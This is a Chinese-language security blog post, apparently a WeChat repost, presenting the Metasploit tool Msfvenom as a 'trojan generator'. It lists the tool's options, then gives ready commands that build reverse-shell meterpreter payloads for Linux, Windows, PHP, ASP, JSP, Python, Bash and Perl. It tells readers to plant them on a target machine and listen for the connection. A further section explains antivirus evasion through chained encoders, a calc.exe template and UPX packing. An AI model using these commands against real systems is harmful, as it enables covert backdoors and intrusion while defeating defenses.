神兵利器 | Msfvenom:木马生成工具【我生成的木马可以走进你的心吗?】

admin 2022年6月15日16:28:34评论738 views字数 2917阅读9分43秒阅读模式

今天给大家带来的是MSF下的一个木马生成工具Msfvenom,相信大家都对他不陌生。Msfvenom是用来生成后门的软件。它是MsfpayloadMsfencode的组合,将这两个工具都放在一个Framework实例中。

⚔️Msfvenom

神兵利器 | Msfvenom:木马生成工具【我生成的木马可以走进你的心吗?】


🍃基本语法

Msfvenom命令行选项如下:

  • 英文版:

神兵利器 | Msfvenom:木马生成工具【我生成的木马可以走进你的心吗?】


  • 中文版:

Options:    

-p, --payload <payload>   指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&#039;-&#039;或者stdin指定     

-l, --list    [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all     

-n, --nopsled <length>  为payload预先指定一个NOP滑动长度     

-f, --format  <format>   指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)     

-e, --encoder [encoder]  指定需要使用的encoder(编码器)     

-a, --arch    <architecture> 指定payload的目标架构,这里x86是32位,x64是64位      

-platform     <platform>   指定payload的目标平台     

-s, --space   <length>  设定有效攻击荷载的最大长度     

-b, --bad-chars  <list> 设定规避字符集,比如: &#039;x00xff&#039;  

-i, --iterations <count> 指定payload的编码次数     

-c, --add-code   <path>  指定一个附加的win32 shellcode文件     

-x, --template   <path>  指定一个自定义的可执行文件作为模板     

-k, --keep   保护模板程序的动作,注入的payload作为一个新的进程运行         

--payload-options  列举payload的标准选项     

-o, --out        <path>    保存payload     

-v, --var-name <name> 指定一个自定义的变量,以确定输出格式         

--shellest      最小化生成payload     

-h, --help       查看帮助选项         

--help-formats   查看msf支持的输出格式列表

♻️实例

一些利用Msfvenom生成shell的命令:

Linux:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

PHP:

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d 'n' > shell.php && pbpaste >> shell.php

ASP:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

Python:

msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash:

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl:

msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

以上都是基本的生成后门木马

只要想方设法放到目标机器上,并运行

在本地监听端口即可

但是你需要有一个公网的ip

🌦️如何免杀

1.可以尝试多重编码:

msfvenom -p windows/meterpreter/reverse_tcp lhost=<Your IP Address> lport=<Your Port to Connect On> -e x86/shikata_ga_nai -i 20 -f raw | msfvenom -e x86/alpha_upper -a x86 --platform windows -i 5 -f raw | msfvenom -e x86/shikata_ga_nai -a x86 --platform windows -i 10 -f raw | msfvenom -e x86/countdown -a x86 --platform windows -i 10 -x calc.exe -f exe -o shell.exe

使用管道msfvenom对攻击载荷多重编码

shikata_ga_nai编码20次

10次的alpha_upper编码

10次的countdown编码

最后生成calc.exe为模板的可执行文件

2.对上述生成的木马进行upx加壳

upx shell.exe

现在的杀毒软件也不是纸糊的

一般的免杀基本可以说过不去

🥕参考链接

https://www.offensive-security.com/metasploit-unleashed/msfvenom/

原文始发于微信公众号(猫因的安全):神兵利器 | Msfvenom:木马生成工具【我生成的木马可以走进你的心吗?】

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月15日16:28:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   神兵利器 | Msfvenom:木马生成工具【我生成的木马可以走进你的心吗?】http://cn-sec.com/archives/1116341.html

发表评论

匿名网友 填写信息